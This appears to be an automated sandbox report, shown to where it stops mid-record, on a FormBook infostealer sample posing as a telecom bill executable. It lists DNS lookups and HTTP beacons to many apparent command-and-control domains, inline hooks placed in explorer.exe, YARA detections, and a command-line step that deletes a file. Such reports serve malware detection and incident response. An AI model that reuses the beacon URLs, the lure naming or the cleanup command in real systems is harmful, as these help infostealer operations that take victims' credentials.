Aug 30, 2024 10:26:36.942787886 CEST	192.168.2.5	1.1.1.1	0x457b	Standard query (0)	www.twinportslocal.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:26:56.395194054 CEST	192.168.2.5	1.1.1.1	0xa347	Standard query (0)	www.vasymaman.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:16.098237991 CEST	192.168.2.5	1.1.1.1	0x26ff	Standard query (0)	www.iiixc759q.xyz	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:17.097822905 CEST	192.168.2.5	1.1.1.1	0x26ff	Standard query (0)	www.iiixc759q.xyz	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:18.114273071 CEST	192.168.2.5	1.1.1.1	0x26ff	Standard query (0)	www.iiixc759q.xyz	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:20.113356113 CEST	192.168.2.5	1.1.1.1	0x26ff	Standard query (0)	www.iiixc759q.xyz	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:36.276895046 CEST	192.168.2.5	1.1.1.1	0x3fa0	Standard query (0)	www.nihilculturamail.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:57.207920074 CEST	192.168.2.5	1.1.1.1	0x7a54	Standard query (0)	www.gv3l1.vip	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:17.748225927 CEST	192.168.2.5	1.1.1.1	0x54f9	Standard query (0)	www.healthsaveplus.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:38.238109112 CEST	192.168.2.5	1.1.1.1	0x76be	Standard query (0)	www.seoservicesdelhi.net	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:58.925826073 CEST	192.168.2.5	1.1.1.1	0x3620	Standard query (0)	www.wheresthechocolateat.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:29:20.108879089 CEST	192.168.2.5	1.1.1.1	0x1859	Standard query (0)	www.wguujb.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:29:40.714348078 CEST	192.168.2.5	1.1.1.1	0x4956	Standard query (0)	www.melliccine.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:30:01.226939917 CEST	192.168.2.5	1.1.1.1	0xefcd	Standard query (0)	www.trenchonbirmingham.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 30, 2024 10:26:37.021075964 CEST	1.1.1.1	192.168.2.5	0x457b	Name error (3)	www.twinportslocal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:26:56.432456017 CEST	1.1.1.1	192.168.2.5	0xa347	No error (0)	www.vasymaman.com		213.186.33.5	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:22.110492945 CEST	1.1.1.1	192.168.2.5	0x26ff	Server failure (2)	www.iiixc759q.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:22.110512018 CEST	1.1.1.1	192.168.2.5	0x26ff	Server failure (2)	www.iiixc759q.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:22.110521078 CEST	1.1.1.1	192.168.2.5	0x26ff	Server failure (2)	www.iiixc759q.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:22.110529900 CEST	1.1.1.1	192.168.2.5	0x26ff	Server failure (2)	www.iiixc759q.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:36.305670977 CEST	1.1.1.1	192.168.2.5	0x3fa0	Name error (3)	www.nihilculturamail.com	none	none	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:57.226470947 CEST	1.1.1.1	192.168.2.5	0x7a54	No error (0)	www.gv3l1.vip	gtm-sg-6wr2vph4409.gtm-i2d8.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 10:27:57.226470947 CEST	1.1.1.1	192.168.2.5	0x7a54	No error (0)	gtm-sg-6wr2vph4409.gtm-i2d8.com		93.179.125.252	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:57.226470947 CEST	1.1.1.1	192.168.2.5	0x7a54	No error (0)	gtm-sg-6wr2vph4409.gtm-i2d8.com		93.179.124.74	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:27:57.226470947 CEST	1.1.1.1	192.168.2.5	0x7a54	No error (0)	gtm-sg-6wr2vph4409.gtm-i2d8.com		93.179.124.39	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:18.144921064 CEST	1.1.1.1	192.168.2.5	0x54f9	No error (0)	www.healthsaveplus.com	healthsaveplus.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 10:28:18.144921064 CEST	1.1.1.1	192.168.2.5	0x54f9	No error (0)	healthsaveplus.com		199.116.255.220	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:38.254153013 CEST	1.1.1.1	192.168.2.5	0x76be	No error (0)	www.seoservicesdelhi.net	seoservicesdelhi.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 10:28:38.254153013 CEST	1.1.1.1	192.168.2.5	0x76be	No error (0)	seoservicesdelhi.net		162.254.39.135	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:58.943214893 CEST	1.1.1.1	192.168.2.5	0x3620	No error (0)	www.wheresthechocolateat.com	wheresthechocolateat.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 10:28:58.943214893 CEST	1.1.1.1	192.168.2.5	0x3620	No error (0)	wheresthechocolateat.com		76.223.105.230	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:28:58.943214893 CEST	1.1.1.1	192.168.2.5	0x3620	No error (0)	wheresthechocolateat.com		13.248.243.5	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:29:40.726933956 CEST	1.1.1.1	192.168.2.5	0x4956	No error (0)	www.melliccine.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 10:29:40.726933956 CEST	1.1.1.1	192.168.2.5	0x4956	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:30:01.273308992 CEST	1.1.1.1	192.168.2.5	0xefcd	No error (0)	www.trenchonbirmingham.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 10:30:01.273308992 CEST	1.1.1.1	192.168.2.5	0xefcd	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:30:01.273308992 CEST	1.1.1.1	192.168.2.5	0xefcd	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:30:01.273308992 CEST	1.1.1.1	192.168.2.5	0xefcd	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:30:01.273308992 CEST	1.1.1.1	192.168.2.5	0xefcd	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.vasymaman.com

www.gv3l1.vip

www.healthsaveplus.com

www.seoservicesdelhi.net

www.wheresthechocolateat.com

www.melliccine.com

www.trenchonbirmingham.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	64520	213.186.33.5	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:26:56.438729048 CEST	169	OUT	GET /pt46/?BXIxB=u/LO1vo0oQvnH9esjOgrxYTgs3EvA8CcnNa4WF9v/PnUIeIcp88TmQZ9gXPGHdW0FDBL&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1 Host: www.vasymaman.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	64521	93.179.125.252	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:27:57.232291937 CEST	165	OUT	GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=1FKWbINWMtRGM8KgUHNDzt9XpNYq15fP8cs6Q3G+wyeIaD5IyqfTFlrSp9vb08dot3cu HTTP/1.1 Host: www.gv3l1.vip Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	64522	199.116.255.220	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:28:18.174391031 CEST	174	OUT	GET /pt46/?BXIxB=p9DRcm8BELNBVMNAniPV5ICx4gmR3c1RxYXaT3CLClmXYljbHJslQ//IiGA9vCpcHBwF&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1 Host: www.healthsaveplus.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	64523	162.254.39.135	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:28:38.262367010 CEST	176	OUT	GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=OxzdZkr64UrrS3tZ4G1zrrfmnH6WbOReSG/AAD7fX8giKNq6IAa+s9RhfDA3xDtWjS7D HTTP/1.1 Host: www.seoservicesdelhi.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	64524	76.223.105.230	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:28:58.987550974 CEST	180	OUT	GET /pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1 Host: www.wheresthechocolateat.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 30, 2024 10:28:59.452754974 CEST	429	IN	HTTP/1.1 301 Moved Permanently location: https://wheresthechocolateat.com/pt46/?BXIxB=QVbB1/CFLfZKQUfa4MrWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW+9Y4XXWGvNLo&-ZYp=fvRlPd_pa8MLs2 vary: Accept-Encoding server: DPS/2.0.0+sha-1e48316 x-version: 1e48316 x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Fri, 30 Aug 2024 08:28:59 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	64525	23.227.38.74	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:29:40.738456011 CEST	170	OUT	GET /pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2 HTTP/1.1 Host: www.melliccine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 30, 2024 10:29:41.195427895 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Fri, 30 Aug 2024 08:29:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Fri, 30 Aug 2024 08:29:56 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBOUJ8ccdfkXKfGRbiWru9NRiOmPwq1dexqXLc9gwUaZpGx1qQPSY9GQjHRmsoVsjlpwqOvLA9bRHocvs9Pl9jFhwvnIC227DkZ4OSovocTpTK%2B1l%2F8WTZxNAI60cRXN4arO3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=8.999825 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8bb36a1c2ff64261-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><m
Aug 30, 2024 10:29:41.195444107 CEST	1236	IN	Data Raw: 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 Data Ascii: eta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
Aug 30, 2024 10:29:41.195455074 CEST	448	IN	Data Raw: 6f 75 20 61 72 65 20 75 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 3c 2f 73 70 61 6e 3e 20 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 Data Ascii: ou are unable to access</span> myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full">
Aug 30, 2024 10:29:41.195463896 CEST	1236	IN	Data Raw: 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 Data Ascii: -columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself
Aug 30, 2024 10:29:41.195476055 CEST	1222	IN	Data Raw: 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d Data Ascii: n> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	64526	198.185.159.144	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:30:01.334237099 CEST	178	OUT	GET /pt46/?-ZYp=fvRlPd_pa8MLs2&BXIxB=AkSBx0MHJHngnyc0Mde9hHB0CQHAj9XhopBfdHKzsou0ftXFKmhTuyA9cdbN6/Nfe1ve HTTP/1.1 Host: www.trenchonbirmingham.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 30, 2024 10:30:01.781708002 CEST	1236	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 2061 Content-Type: text/html; charset=UTF-8 Date: Fri, 30 Aug 2024 08:30:01 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: 548zTGu9/ChKMajsH Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED] Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
Aug 30, 2024 10:30:01.781725883 CEST	1124	IN	Data Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE1
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE1
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE1
GetMessageA	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE1

Target ID:	0
Start time:	04:25:58
Start date:	30/08/2024
Path:	C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe"
Imagebase:	0x8a0000
File size:	1'192'448 bytes
MD5 hash:	DF6915639ADAA48DAD6B5CAD220F1B73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:25:58
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe"
Imagebase:	0x430000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:25:59
Start date:	30/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:26:01
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\chkdsk.exe"
Imagebase:	0xdb0000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:26:05
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0x790000
File size:	236'544 bytes
